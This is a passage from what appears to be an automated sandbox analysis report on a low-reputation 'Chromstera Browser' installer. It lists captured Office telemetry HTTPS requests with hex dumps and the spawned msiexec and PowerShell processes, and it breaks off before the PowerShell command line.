                                                                                                                                                                            2024-10-28 18:12:44 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            143192.168.2.45916313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:45 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:45 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:45 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1372
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                            ETag: "0x8DC582BE6669CA7"
                                                                                                                                                                            x-ms-request-id: 8e66950d-f01e-0003-769c-274453000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181245Z-17fbfdc98bbp77nqf5g2c5aavs00000004z000000000dar7
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:45 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            144192.168.2.45916413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:45 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:45 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:45 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1408
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE1038EF2"
                                                                                                                                                                            x-ms-request-id: 77170aa2-001e-0049-0450-235bd5000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181245Z-r1755647c66f4bf880huw27dwc00000006v00000000016kw
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:45 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            145192.168.2.45916513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:45 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:45 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:45 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1371
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                                                                                                            ETag: "0x8DC582BED3D048D"
                                                                                                                                                                            x-ms-request-id: 213f141a-701e-0098-0f9c-27395f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181245Z-17fbfdc98bbgnnfwq36myy7z0g00000005w000000000fd6k
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:45 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            146192.168.2.45916613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:45 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:45 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:45 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE0F427E7"
                                                                                                                                                                            x-ms-request-id: d209a394-901e-00a0-0587-286a6d000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181245Z-r1755647c66pzcrw3ktqe96x2s00000006hg00000000h5vd
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:45 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            147192.168.2.45916713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:45 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:45 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:45 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                            ETag: "0x8DC582BDD0A87E5"
                                                                                                                                                                            x-ms-request-id: f75da22b-f01e-0085-0130-2788ea000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181245Z-r1755647c66tsn7nz9wda692z000000003v0000000001ha6
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:45 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            148192.168.2.45917113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:46 UTC192OUTGET /rules/rule703100v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:46 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:46 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:04 GMT
                                                                                                                                                                            ETag: "0x8DC582BEBCD5699"
                                                                                                                                                                            x-ms-request-id: 38933265-a01e-0053-619c-278603000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181246Z-r1755647c66vwt2b5wfzb6a204000000026g000000000s6s
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:46 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            149192.168.2.45917013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:46 UTC192OUTGET /rules/rule703101v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:46 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:46 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE0F93037"
                                                                                                                                                                            x-ms-request-id: 2073a42b-101e-0065-1a58-274088000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181246Z-17fbfdc98bbjwdgn5g1mr5hcxn00000003a0000000006qaa
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:46 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS"


                                                                                                                                                                            Statistics

                                                                                                                                                                            CPU Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Memory Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:14:11:19
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\setup.exe"
                                                                                                                                                                            Imagebase:0xba0000
                                                                                                                                                                            File size:9'454'152 bytes
                                                                                                                                                                            MD5 hash:8ACA54559265D2A9AD0A810C425C644F
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:1
                                                                                                                                                                            Start time:14:11:21
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                            Imagebase:0x7ff776780000
                                                                                                                                                                            File size:69'632 bytes
                                                                                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:2
                                                                                                                                                                            Start time:14:11:21
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding DD3B85FC1F11BB110F90DDDEF4702234 C
                                                                                                                                                                            Imagebase:0x8d0000
                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:14:11:23
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Chromstera Browser" SECONDSEQUENCE="1" CLIENTPROCESSID="7404" AI_MORE_CMD_LINE=1
                                                                                                                                                                            Imagebase:0xba0000
                                                                                                                                                                            File size:9'454'152 bytes
                                                                                                                                                                            MD5 hash:8ACA54559265D2A9AD0A810C425C644F
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:14:11:25
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C
                                                                                                                                                                            Imagebase:0x8d0000
                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:5
                                                                                                                                                                            Start time:14:11:26
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000
                                                                                                                                                                            Imagebase:0x8d0000
                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:6
                                                                                                                                                                            Start time:14:11:27
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            Wow64 process (32bit):false
